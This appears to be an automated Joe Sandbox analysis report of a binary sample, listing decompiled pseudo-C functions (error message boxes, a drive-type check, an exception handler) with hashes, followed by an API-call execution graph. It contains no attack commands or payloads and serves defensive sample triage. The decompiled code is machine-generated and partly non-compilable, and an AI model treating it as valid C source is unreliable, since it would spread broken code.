                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: faf05a51412c136d4df27fd54e94fde237192e47eef154158da5a178366b963d
                                                                                                                                                                                                                              • Instruction ID: 0ac95140751388048400eb5d7332f39d8a0ee7f232b7c1d8011fa2e53c3a8eb0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faf05a51412c136d4df27fd54e94fde237192e47eef154158da5a178366b963d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921C3B3A0824392EB24AB12D05427DA3B2FB84F8CFC64435D68D43285CFBCEA44D760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C42820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 63%
                                                                                                                                                                                                                              			E00007FF77FF735C42820(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t21;
				void* _t31;
				void* _t32;
				signed long long _t36;
				signed long long _t37;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t64;

				_t58 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF735C4A3B0(0x1448, __rax, _t63, _t64);
				_t56 = _t55 - __rax;
				_t36 =  *0x35c7b008; // 0x861d85c91f07
				_t37 = _t36 ^ _t55 - __rax;
				_a5152 = _t37;
				_t38 = __rcx;
				E00007FF77FF735C41040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				_t21 = E00007FF77FF735C532C4(_t31, _t32,  *_t37 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF735C4B800(_t21, 0,  &_a1056,  &_a32, __r8);
				r8d = 0x400;
				E00007FF77FF735C47250(_t37, __rcx,  &_a3104,  &_a32, _t54, __r8);
				if (_t37 == 0) goto 0x35c428f9;
				r8d = 0x400;
				E00007FF77FF735C47250(_t37, _t38,  &_a1056, "Fatal error detected", _t54, _t58);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0x35c42913;
				r9d = 0x30;
				return E00007FF77FF735C4A410(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t56);
			}














                                                                                                                                                                                                                              0x7ff735c42820
                                                                                                                                                                                                                              0x7ff735c42820
                                                                                                                                                                                                                              0x7ff735c42825
                                                                                                                                                                                                                              0x7ff735c4282a
                                                                                                                                                                                                                              0x7ff735c4282f
                                                                                                                                                                                                                              0x7ff735c4283b
                                                                                                                                                                                                                              0x7ff735c42840
                                                                                                                                                                                                                              0x7ff735c42843
                                                                                                                                                                                                                              0x7ff735c4284a
                                                                                                                                                                                                                              0x7ff735c4284d
                                                                                                                                                                                                                              0x7ff735c42855
                                                                                                                                                                                                                              0x7ff735c42860
                                                                                                                                                                                                                              0x7ff735c42865
                                                                                                                                                                                                                              0x7ff735c42872
                                                                                                                                                                                                                              0x7ff735c4287b
                                                                                                                                                                                                                              0x7ff735c42888
                                                                                                                                                                                                                              0x7ff735c42897
                                                                                                                                                                                                                              0x7ff735c4289d
                                                                                                                                                                                                                              0x7ff735c428a2
                                                                                                                                                                                                                              0x7ff735c428b5
                                                                                                                                                                                                                              0x7ff735c428bd
                                                                                                                                                                                                                              0x7ff735c428bf
                                                                                                                                                                                                                              0x7ff735c428d4
                                                                                                                                                                                                                              0x7ff735c428d9
                                                                                                                                                                                                                              0x7ff735c428f1
                                                                                                                                                                                                                              0x7ff735c428f7
                                                                                                                                                                                                                              0x7ff735c428f9
                                                                                                                                                                                                                              0x7ff735c4292c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: Fatal error detected
                                                                                                                                                                                                                              • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                              • Opcode ID: aac0a7e75af0a51211721490b4ee2d301338d0b18f4588194c24415c24b34cad
                                                                                                                                                                                                                              • Instruction ID: 0c3f243b0912601c2e48cd8f0a0f3d7eb8a74460a8ccf83b28128bb7128139bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aac0a7e75af0a51211721490b4ee2d301338d0b18f4588194c24415c24b34cad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B32171B3628683A1E620AB11F4517EAE365FB84B8CFC05135EA8D47A95DF3CD205D760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C42930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 63%
                                                                                                                                                                                                                              			E00007FF77FF735C42930(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t21;
				void* _t31;
				void* _t32;
				signed long long _t36;
				signed long long _t37;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t64;

				_t58 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF735C4A3B0(0x1448, __rax, _t63, _t64);
				_t56 = _t55 - __rax;
				_t36 =  *0x35c7b008; // 0x861d85c91f07
				_t37 = _t36 ^ _t55 - __rax;
				_a5152 = _t37;
				_t38 = __rcx;
				E00007FF77FF735C41040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				_t21 = E00007FF77FF735C532C4(_t31, _t32,  *_t37 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF735C4B800(_t21, 0,  &_a1056,  &_a32, __r8);
				r8d = 0x400;
				E00007FF77FF735C47250(_t37, __rcx,  &_a3104,  &_a32, _t54, __r8);
				if (_t37 == 0) goto 0x35c42a09;
				r8d = 0x400;
				E00007FF77FF735C47250(_t37, _t38,  &_a1056, "Error detected", _t54, _t58);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0x35c42a23;
				r9d = 0x30;
				return E00007FF77FF735C4A410(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t56);
			}














                                                                                                                                                                                                                              0x7ff735c42930
                                                                                                                                                                                                                              0x7ff735c42930
                                                                                                                                                                                                                              0x7ff735c42935
                                                                                                                                                                                                                              0x7ff735c4293a
                                                                                                                                                                                                                              0x7ff735c4293f
                                                                                                                                                                                                                              0x7ff735c4294b
                                                                                                                                                                                                                              0x7ff735c42950
                                                                                                                                                                                                                              0x7ff735c42953
                                                                                                                                                                                                                              0x7ff735c4295a
                                                                                                                                                                                                                              0x7ff735c4295d
                                                                                                                                                                                                                              0x7ff735c42965
                                                                                                                                                                                                                              0x7ff735c42970
                                                                                                                                                                                                                              0x7ff735c42975
                                                                                                                                                                                                                              0x7ff735c42982
                                                                                                                                                                                                                              0x7ff735c4298b
                                                                                                                                                                                                                              0x7ff735c42998
                                                                                                                                                                                                                              0x7ff735c429a7
                                                                                                                                                                                                                              0x7ff735c429ad
                                                                                                                                                                                                                              0x7ff735c429b2
                                                                                                                                                                                                                              0x7ff735c429c5
                                                                                                                                                                                                                              0x7ff735c429cd
                                                                                                                                                                                                                              0x7ff735c429cf
                                                                                                                                                                                                                              0x7ff735c429e4
                                                                                                                                                                                                                              0x7ff735c429e9
                                                                                                                                                                                                                              0x7ff735c42a01
                                                                                                                                                                                                                              0x7ff735c42a07
                                                                                                                                                                                                                              0x7ff735c42a09
                                                                                                                                                                                                                              0x7ff735c42a3c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: Error detected
                                                                                                                                                                                                                              • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                              • Opcode ID: 2b9bf9c732f17b159b52ae29801a096248ae3528245f251e939715c73000afe1
                                                                                                                                                                                                                              • Instruction ID: e1656895630cbe461f024b7f8adf8bc5a0cf5eb033c992cd568207863c6ddefc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b9bf9c732f17b159b52ae29801a096248ae3528245f251e939715c73000afe1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E52171B3628683A1E621AB11E4517EAE265FB84B8CFC05135EA8D47A95DE3CD205C760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4E270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: c73e51171a128cb0be50b8eb6e98cafae5a0d256d82ba558893c3aa46c897f1e
                                                                                                                                                                                                                              • Instruction ID: e7b648471abc01b8fa7d1aedbcd581b82450cfb0d659b75f56400b75e4f7719d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c73e51171a128cb0be50b8eb6e98cafae5a0d256d82ba558893c3aa46c897f1e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9116A32A08B4292EB219F15E40066AF7A5FB88F88F594230EF8C07B68DF3CD551CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5E65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                                                              			E00007FF77FF735C5E65C(void* __ecx) {
				signed int _v16;
				short _v18;
				intOrPtr _v22;
				short _v24;
				void* _t20;
				signed long long _t26;
				signed long long _t27;
				signed long long _t32;

				_t20 = __ecx;
				_t26 =  *0x35c7b008; // 0x861d85c91f07
				_t27 = _t26 ^ _t32;
				_v16 = _t27;
				if (__ecx - 0x1a <= 0) goto 0x35c5e695;
				E00007FF77FF735C53AF8(_t27);
				 *_t27 = 0xf;
				E00007FF77FF735C53B18(_t27);
				 *_t27 = 0xd;
				E00007FF77FF735C59400();
				goto 0x35c5e6c9;
				if (_t20 != 0) goto 0x35c5e6a0;
				goto 0x35c5e6c9;
				_v22 = 0x5c003a;
				_v24 = _t20 + 0x40;
				_v18 = 0;
				return E00007FF77FF735C4A410(0 | GetDriveTypeW(??) - 0x00000002 >= 0x00000000, _t20 + 0x40, _v16 ^ _t32);
			}











                                                                                                                                                                                                                              0x7ff735c5e65c
                                                                                                                                                                                                                              0x7ff735c5e662
                                                                                                                                                                                                                              0x7ff735c5e669
                                                                                                                                                                                                                              0x7ff735c5e66c
                                                                                                                                                                                                                              0x7ff735c5e674
                                                                                                                                                                                                                              0x7ff735c5e676
                                                                                                                                                                                                                              0x7ff735c5e67b
                                                                                                                                                                                                                              0x7ff735c5e681
                                                                                                                                                                                                                              0x7ff735c5e686
                                                                                                                                                                                                                              0x7ff735c5e68c
                                                                                                                                                                                                                              0x7ff735c5e693
                                                                                                                                                                                                                              0x7ff735c5e699
                                                                                                                                                                                                                              0x7ff735c5e69e
                                                                                                                                                                                                                              0x7ff735c5e6a4
                                                                                                                                                                                                                              0x7ff735c5e6ac
                                                                                                                                                                                                                              0x7ff735c5e6b6
                                                                                                                                                                                                                              0x7ff735c5e6db

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 3215553584-336475711
                                                                                                                                                                                                                              • Opcode ID: f1322ca9e98a07d2ad7b2ba965ce2ee688d6c199f62d03d7976de114243e9ff3
                                                                                                                                                                                                                              • Instruction ID: 27cbeae4e61abc645940e6e997911e7d34f5d6ffef96136b942e7806236164c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1322ca9e98a07d2ad7b2ba965ce2ee688d6c199f62d03d7976de114243e9ff3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF01F2A3908203A2F721BFA1945617EE360EF44B4CFC01835D94D46655DF2CD108DB34
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C6833C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C6833C(long long __rbx, intOrPtr* __rcx, void* __r8, long long _a8) {
				void* _t6;
				void* _t10;
				void* _t15;
				void* _t17;
				void* _t22;

				_a8 = __rbx;
				_t6 = E00007FF77FF735C4BBB8(_t10, __rcx, __rcx, _t15, _t17, __r8, _t22);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x35c68364;
				if ( *__rcx != 0xe06d7363) goto 0x35c68364;
				if (_t6 == 1) goto 0x35c6836f;
				return _t6;
			}








                                                                                                                                                                                                                              0x7ff735c6833c
                                                                                                                                                                                                                              0x7ff735c6834c
                                                                                                                                                                                                                              0x7ff735c68355
                                                                                                                                                                                                                              0x7ff735c6835d
                                                                                                                                                                                                                              0x7ff735c68362
                                                                                                                                                                                                                              0x7ff735c6836e

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __C_specific_handler.LIBVCRUNTIME ref: 00007FF735C6834C
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C4BBB8: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF735C4BBE3
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C4BBB8: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF735C4BC78
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C4BBB8: RtlUnwindEx.KERNEL32 ref: 00007FF735C4BCC7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: C_specific_handlerCurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 3112662972-629598281
                                                                                                                                                                                                                              • Opcode ID: fee7efc50866b71b3da09506b2029dcc7c38264c54b219a9524244876756a882
                                                                                                                                                                                                                              • Instruction ID: 1fb9243f53552df373bfd099c58cc6ebcc5c5653940d4482dcb033210f65deb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fee7efc50866b71b3da09506b2029dcc7c38264c54b219a9524244876756a882
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72E0E563C08343A0E7653B25A08013CA6D1BF04F9CF989130DB480A79ACE3DD8A09611
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:1.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:2.1%
                                                                                                                                                                                                                              Total number of Nodes:1636
                                                                                                                                                                                                                              Total number of Limit Nodes:22
                                                                                                                                                                                                                              execution_graph 29961 70a0e230 29962 70a0e3db 29961->29962 29963 70a0e285 29961->29963 29963->29962 29964 70a0e345 strlen strncmp 29963->29964 29966 70a0e36b 29964->29966 29966->29962 29967 70a0d750 29966->29967 29994 70a95a10 29967->29994 29970 70a0d7d2 29972 70a0e090 29970->29972 29973 70a0d7e0 29970->29973 29971 70a0d7fe 29996 70a0a1f0 malloc 29971->29996 30038 70a95c40 14 API calls 29972->30038 29973->29971 29991 70a0da9a 29973->29991 29992 70a0d796 29973->29992 29993 70a0d7bb 29973->29993 29978 70a0dabd 29978->29992 30041 70a95c40 14 API calls 29978->30041 29979 70a052d0 35 API calls 29979->29992 29980 70a0a1f0 55 API calls 29980->29992 29983 70a0d824 30034 70a04560 35 API calls 29983->30034 29987 70a0d82f free 29987->29992 29989 70a0d8f6 free 29989->29992 30036 70a04560 35 API calls 29991->30036 29992->29978 29992->29979 29992->29980 29992->29993 30035 70a052d0 35 API calls 29992->30035 30037 70a26160 __iob_func abort 29992->30037 30039 70a25ac0 __iob_func abort 29992->30039 30040 70a26620 __iob_func abort 29992->30040 29993->29962 29995 70a0d766 strlen strncmp 29994->29995 29995->29970 29995->29992 29997 70a0a294 29996->29997 29998 70a0a21a 29996->29998 29999 70a0a390 29997->29999 30000 70a0a2ab 29997->30000 30042 70a2d450 __iob_func abort 29998->30042 30046 70a04200 7 API calls 29999->30046 30005 70a0a490 _errno strerror 30000->30005 30006 70a0a2ba _errno 30000->30006 30003 70a0a225 30012 70a0a260 free 30003->30012 30013 70a0a240 30003->30013 30004 70a0a3a3 30007 70a0a500 fprintf 30004->30007 30008 70a0a3af _errno 30004->30008 30017 70a0a4b6 fprintf 30005->30017 30009 70a0a24a 30006->30009 30021 70a0a537 _errno strerror fprintf 30007->30021 30010 70a0a557 _errno strerror fprintf 30008->30010 30011 70a0a3bb 8 API calls 30008->30011 30009->29983 30009->29993 30020 70a0a430 fprintf 30011->30020 30014 70a0a2c4 30012->30014 30015 70a0a279 30012->30015 30043 70a03760 14 API calls 30013->30043 30044 70a04200 7 API calls 30014->30044 30023 70a0a288 _errno 30015->30023 30030 70a0a460 30015->30030 30017->30007 30025 70a0a445 fputc 30020->30025 30021->30010 30022 70a0a2d7 30022->30017 30024 70a0a2e3 _errno 30022->30024 30023->30009 30024->30021 30026 70a0a2ef fprintf 30024->30026 30025->30030 30045 70a2d430 30026->30045 30029 70a0a31a fprintf fputc fclose 30031 70a0a34f 30029->30031 30030->30005 30032 70a0a360 fprintf 30031->30032 30033 70a0a375 fputc 30032->30033 30033->29999 30034->29987 30035->29989 30036->29978 30037->29992 30039->29992 30040->29992 30042->30003 30043->30009 30044->30022 30045->30029 30046->30004 30047 70a19370 30048 70a1a030 30047->30048 30063 70a19391 30047->30063 30050 70a1a047 _errno 30048->30050 30763 70a1a080 30048->30763 30049 70a1a560 30052 70a1a120 _errno 30049->30052 30053 70a1a58a 30049->30053 30125 70a19e51 30050->30125 30051 70a1a064 30052->30051 30052->30763 30990 70a04200 7 API calls 30053->30990 30054 70a1a253 _errno 30056 70a1a261 fprintf fprintf fputc fclose 30054->30056 30057 70a1a943 _errno strerror fprintf 30054->30057 30066 70a1a2be fprintf 30056->30066 30057->30763 30058 70a1a09f _errno 30061 70a1ade3 _errno strerror fprintf 30058->30061 30062 70a1a0ab fprintf fputc fclose 30058->30062 30059 70a1a59d 30064 70a1a830 fprintf 30059->30064 30065 70a1a5a9 _errno 30059->30065 30060 70a1ac8e fprintf 30060->30125 30061->30125 30075 70a1a0e8 fputc 30062->30075 30063->30049 30080 70a1958b GetProcAddress 30063->30080 30063->30763 30064->30125 30069 70a1a5b5 fprintf fprintf fputc fclose 30065->30069 30070 70a1b85b _errno strerror fprintf 30065->30070 30074 70a1a2d0 fputc 30066->30074 30068 70a1a20e fprintf 30068->30763 30083 70a1a619 fprintf 30069->30083 30070->30763 30071 70a1a15c _errno 30077 70a1bb43 _errno strerror fprintf 30071->30077 30078 70a1a168 fprintf fputc fclose 30071->30078 30073 70a1a971 fprintf 30073->30125 30088 70a1a2e2 GetProcAddress 30074->30088 30075->30051 30077->30763 30084 70a1a1ba fputc 30078->30084 30086 70a1a101 30080->30086 30087 70a1960b GetProcAddress 30080->30087 30082 70a1ae18 _errno 30082->30125 30092 70a1a632 fputc 30083->30092 30084->30125 30086->30763 30989 70a04200 7 API calls 30086->30989 30087->30049 30090 70a19620 GetProcAddress 30087->30090 30091 70a19651 GetProcAddress 30088->30091 30088->30763 30093 70a19635 GetProcAddress 30090->30093 30094 70a1a644 30090->30094 30095 70a1966d GetProcAddress 30091->30095 30091->30125 30092->30052 30093->30088 30093->30091 30094->30052 30991 70a04200 7 API calls 30094->30991 30104 70a19689 GetProcAddress 30095->30104 30095->30125 30098 70a1b4a0 _errno 30100 70a1c14b _errno strerror fprintf 30098->30100 30098->30763 30099 70a1b89a _errno 30101 70a1c47d _errno strerror fprintf 30099->30101 30099->30763 30100->30125 30101->30763 30102 70a1b680 free 30102->30125 30102->30763 30103 70a1bb82 _errno 30112 70a1c670 _errno strerror fprintf 30103->30112 30113 70a1bb8e fprintf fprintf fputc fclose 30103->30113 30115 70a1969e GetProcAddress 30104->30115 30104->30125 30105 70a1a3e3 30107 70a1a7f0 fprintf 30105->30107 30108 70a1a3ef _errno 30105->30108 30106 70a1b0bf _errno 30119 70a1bc7d _errno strerror fprintf 30106->30119 30106->30125 30107->30064 30120 70a1b5d0 _errno strerror fprintf 30108->30120 30121 70a1a3fd fprintf fprintf fputc fclose 30108->30121 30109 70a1b35e fprintf fprintf fputc fclose 30109->30763 30110 70a1bafa fprintf 30140 70a1bb23 _errno strerror fprintf 30110->30140 30111 70a049d0 51 API calls 30123 70a1ad1c free 30111->30123 30133 70a1c690 _errno strerror fprintf 30112->30133 30141 70a1bbeb fprintf 30113->30141 30114 70a1a9d7 _errno 30114->30051 30162 70a1a9f4 30114->30162 30124 70a196ba GetProcAddress 30115->30124 30115->30125 30116 70a1be66 fprintf 30116->30763 30117 70a1a8a6 _errno 30129 70a1a8b4 fprintf fprintf fputc fclose 30117->30129 30130 70a1c5db _errno strerror fprintf 30117->30130 30119->30763 30151 70a1b5f0 fprintf 30120->30151 30148 70a1a461 fprintf 30121->30148 30122 70a1b4c1 _errno strerror fprintf 30122->30125 30969 70a0d550 30123->30969 30124->30125 30135 70a196cf GetProcAddress GetProcAddress 30124->30135 30125->30051 30125->30052 30125->30082 30125->30102 30125->30106 30125->30111 30125->30114 30137 70a1b6c1 _errno 30125->30137 30199 70a1c8c1 _errno 30125->30199 30207 70a1ad67 _time64 30125->30207 30234 70a1b17f _errno 30125->30234 30736 70a1f69e GetProcAddress 